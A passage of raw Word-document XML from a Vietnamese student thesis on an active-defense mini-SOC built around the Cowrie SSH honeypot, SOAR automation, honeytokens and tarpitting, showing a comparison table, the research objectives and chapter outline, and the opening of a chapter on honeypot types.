                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tùy biến Filesystem chuyên sâu + Gài bẫy Honeytokens (Canary de-anonymization).</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rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Phản đòn &amp; Tiêu hao Tài nguyên</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Không có. Attacker quét thoải mái.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DF">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Kỹ thuật Tarpitting (Giam lỏng kết nối, làm treo thread tấn công của Botnet).</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0E0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Phân tích Mã độc (Malware Staging)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Chỉ lưu file vào ổ đĩa, không làm gì thêm.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E2">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload Analyzer tự động trích xuất SHA256, IOCs và tra cứu VirusTotal.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Thời gian Phản ứng (MTTR)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E4">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Phụ thuộc 100% vào người đọc tin nhắn (15 - 30 phút).</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tự động hóa hoàn toàn bằng SOAR Playbooks (1.8 - 2.5 giây).</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E6">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E7">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1.5 Mục tiêu nghiên cứu và Các đóng góp khoa học - kỹ thuật của Đề tài</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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Mục tiêu tổng quát của đồ án là nghiên cứu, thiết kế kiến trúc và hiện thực hóa thành công một Hệ thống Phòng thủ Chủ động (Active Defense Framework) quy mô Mini-SOC, tích hợp chặt chẽ giữa Cowrie SSH Honeypot với Nền tảng Tự động hóa Phản ứng Sự cố (SOAR) và Trinh sát ngược Kẻ tấn công nhằm bảo vệ hạ tầng máy chủ Linux trước các chiến dịch tấn công dò quét tự động.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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đạt được mục tiêu tổng quát trên, đồ án tập trung vào các mục tiêu cụ thể và đạt được các đóng góp kỹ thuật then chốt sau:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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Về mặt Lý thuyết &amp; Khung phương pháp luận: Phân định ranh giới pháp lý và kỹ thuật giữa 'Hack-back phá hoại bất hợp pháp' và 'Phòng thủ chủ động hợp pháp (Active Defense)' dựa trên khung chiến lược chuẩn quốc tế MITRE D3FEND và MITRE Engage. Xây dựng mô hình chuỗi phản đòn bằng Deception và De-anonymization.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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Về mặt Thiết kế Kiến trúc Hệ thống: Thiết kế kiến trúc phân lớp Mini-SOC linh hoạt, module hóa cao độ, đảm bảo khả năng mở rộng (Scalability) và dễ dàng tích hợp thêm các cảm biến honeypot khác trong tương lai.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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Về mặt Xây dựng Động cơ Tương quan (Correlation Engine): Tự phát triển thuật toán trượt cửa sổ thời gian (Sliding Time Window) để phát hiện tấn công dò quét mật khẩu (T1110.001), phân biệt giữa các đợt quét tự động vô hại và các cuộc xâm nhập có chủ đích, loại bỏ triệt để hiện tượng Alert Fatigue.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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Về mặt Trinh sát ngược &amp; Tình báo đe dọa (Threat Intel Engine): Tích hợp tự động đa nguồn dữ liệu mở (Multi-source OSINT) bao gồm AbuseIPDB, Shodan API, GeoIP ASN và cơ chế quét cổng an toàn (Safe Port Probing) nhằm lập hồ sơ kẻ tấn công (Attacker Profiling) ngay trong mili-giây đầu tiên của sự cố.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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5. Về mặt Đánh lừa &amp; Bẫy mồi Khử ẩn danh (Active Honeytokens): Xây dựng cơ chế sinh tự động các file tài liệu mồi nhử (Fake AWS Keys, Fake Bash History, Fake Database Dumps) có nhúng Canary Webhook Beacons. Khi hacker đánh cắp tài liệu và mở trên máy thật, hệ thống sẽ bắt được IP thật và dấu vân tay trình duyệt của hacker, giải quyết triệt để bài toán hacker ẩn danh qua Proxy/Tor.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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6. Về mặt Tự động hóa Phản ứng &amp; Tiêu hao đối phương (SOAR Enforcer &amp; Tarpitting): Triển khai thành công kỹ thuật giam lỏng Tarpit (Endless Socket Hold) làm tiêu hao tài nguyên CPU/RAM/Bandwidth của các máy chủ tấn công, kết hợp với cơ chế cập nhật tự động Tường lửa iptables/nftables và đồng bộ Threat Feed IOCs.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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7. Về mặt Tác chiến &amp; Điều hành: Xây dựng Telegram SOAR Bot tương tác 2 chiều (Bidirectional Interactive Bot) trang bị bàn phím điều khiển tức thời (Inline Keyboard Actions), cho phép chuyên viên SOC ra quyết định tác chiến ngay trên thiết bị di động trong vài giây.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1">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1.6 Đối tượng, Phạm vi và Giới hạn nghiên cứu</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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Đối tượng nghiên cứu: Các hành vi, kỹ thuật và phương thức tấn công nhắm vào dịch vụ truy cập từ xa SSH/Telnet; Công nghệ bẫy Medium-Interaction Honeypot (Cowrie); Kỹ thuật phân tích log và tương quan sự kiện theo chuẩn MITRE ATT&amp;CK; Kỹ thuật phòng thủ chủ động bằng Honeytoken và Tarpitting; Nền tảng điều phối phản ứng sự cố tự động SOAR.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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Phạm vi triển khai: Hệ thống được xây dựng và triển khai trên nền tảng hệ điều hành máy chủ Linux (Ubuntu Server 22.04 LTS / Debian 12), hỗ trợ môi trường ảo hóa Docker Container và tương thích kiểm thử trên máy trạm Windows.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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Giới hạn nghiên cứu: Đồ án tập trung vào phân tích và phản ứng các cuộc tấn công nhắm vào giao thức SSH và Telnet. Các cuộc tấn công ứng dụng Web (HTTP/HTTPS) hoặc dịch vụ cơ sở dữ liệu phân tán không nằm trong phạm vi cảm biến chính của đề tài (mặc dù kiến trúc SOAR được thiết kế sẵn sàng để mở rộng nhận log từ các cảm biến khác).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F5">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1.7 Bố cục toàn văn của Đồ án</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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Nội dung báo cáo đồ án được kết cấu thành 6 chương chính cùng các phần phụ lục và danh mục tài liệu tham khảo chi tiết:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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Chương 1: Tổng quan và Đặt vấn đề - Phân tích bối cảnh, thực trạng tấn công SSH, hạn chế của phòng thủ thụ động, phân tích nhận xét của giảng viên và xác định mục tiêu nghiên cứu.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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Chương 2: Cơ sở Lý thuyết và Khung Công nghệ - Trình bày nền tảng lý thuyết về Honeypot, kiến trúc Cowrie, khung pháp lý/kỹ thuật của Active Defense, công nghệ Honeytoken khử ẩn danh, khung tự động hóa SOAR, kỹ thuật Tarpit và ma trận MITRE ATT&amp;CK.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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Chương 3: Thiết kế Kiến trúc Hệ thống Mini-SOC Active Defense - Trình bày thiết kế chi tiết 5 phân lớp của hệ thống, luồng dữ liệu, lưu đồ thuật toán tương quan sự kiện và thiết kế các playbook phản ứng sự cố.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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Chương 4: Hiện thực hóa và Mã nguồn các Phân hệ - Chi tiết hóa quá trình cài đặt môi trường, tùy biến Honeypot chuyên sâu và phân tích mã nguồn chi tiết các module Python tự phát triển.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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Chương 5: Thử nghiệm Thực tế, Đánh giá và Phân tích Tấn công - Trình bày kết quả kiểm nghiệm trên 4 kịch bản tấn công Red Team giả lập, phân tích hiệu năng giảm thiểu MTTR, đánh giá hiệu quả bóp nghẽn của Tarpit và thống kê dữ liệu tấn công thực tế từ Internet.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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Chương 6: Kết luận và Hướng phát triển - Tổng kết các đóng góp đạt được, chỉ ra những hạn chế và đề xuất định hướng phát triển nâng cao trong tương lai.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD">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FE">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CHƯƠNG 2: CƠ SỞ LÝ THUYẾT VÀ KHUNG CÔNG NGHỆ</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FF">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2.1 Bản chất và Phân loại Công nghệ Bẫy Honeypot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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Thuật ngữ Honeypot (Bình mật) được giới thiệu lần đầu tiên trong lĩnh vực an toàn thông tin bởi Clifford Stoll trong cuốn tiểu thuyết kinh điển 'The Cuckoo's Egg' (1989) và sau đó được Lance Spitzner chính thức định nghĩa một cách khoa học: 'Honeypot là một tài nguyên an ninh thông tin mà giá trị cốt lõi của nó nằm ở chỗ nó bị thăm dò, bị tấn công hoặc bị xâm phạm trái phép'. Bản chất của Honeypot là một hệ thống không phục vụ bất kỳ mục đích sản xuất hay kinh doanh hợp pháp nào. Do đó, bất kỳ nỗ lực kết nối, rà quét hay tương tác nào hướng tới Honeypot đều được coi là hành vi bất thường hoặc có ý đồ xấu.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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Dựa trên mức độ tương tác (Level of Interaction) cho phép kẻ tấn công thực hiện, công nghệ Honeypot được phân chia thành ba nhóm chính:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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Honeypot tương tác thấp (Low-Interaction Honeypots): Hệ thống chỉ mô phỏng các tầng giao thức mạng cơ bản (chẳng hạn như bắt tay TCP SYN-ACK hoặc trả lời các banner dịch vụ tĩnh). Hệ thống không có hệ điều hành thật hay shell dòng lệnh nào được thực thi. Điển hình cho dòng này là Honeyd. Ưu điểm là tiêu tốn cực ít tài nguyên phần cứng, an toàn tuyệt đối vì hacker không thể lợi dụng để phá hoại, nhưng nhược điểm là không thu thập được kịch bản tấn công phức tạp và rất dễ bị các công cụ quét chuyên nghiệp phát hiện (Fingerprinted).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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Honeypot tương tác trung bình (Medium-Interaction Honeypots): Hệ thống mô phỏng một môi trường ứng dụng và hệ thống tệp tin giả lập đầy đủ hơn. Hệ thống có khả năng tương tác với kẻ tấn công thông qua các phiên bản giả lập của shell (như bash), cung cấp khả năng bắt giữ các tệp tin tải lên (payload downloading) và mô phỏng thành công các lỗ hổng dịch vụ phổ biến mà không cần chạy một hệ điều hành thực tế bên dưới. Cowrie và Dionaea là hai đại diện tiêu biểu nhất. Đây là giải pháp cân bằng hoàn hảo giữa độ an toàn và độ phong phú của dữ liệu thu thập được.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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Honeypot tương tác cao (High-Interaction Honeypots): Hệ thống sử dụng máy ảo (Virtual Machine) hoặc máy chủ vật lý thực sự chạy hệ điều hành hoàn chỉnh (Real OS) và các dịch vụ thực tế để kẻ tấn công xâm nhập. Mọi hành vi của hacker đều được giám sát chặt chẽ từ bên ngoài thông qua hypervisor hoặc kernel hook. Nhược điểm lớn nhất là rủi ro an ninh rất cao: nếu cấu hình cô lập mạng không cẩn thận, kẻ tấn công có thể biến máy bẫy thành bàn đạp tấn công ngược lại toàn bộ hệ thống nội bộ của doanh nghiệp.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105">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2.1: Ma trận so sánh các dòng Honeypot mã nguồn mở phổ biến trên thế giới</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6"/>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1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1881"/>
            <w:gridCol w:w="1881"/>
            <w:gridCol w:w="1881"/>
            <w:gridCol w:w="1881"/>
            <w:gridCol w:w="1881"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Dòng Honeypot</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
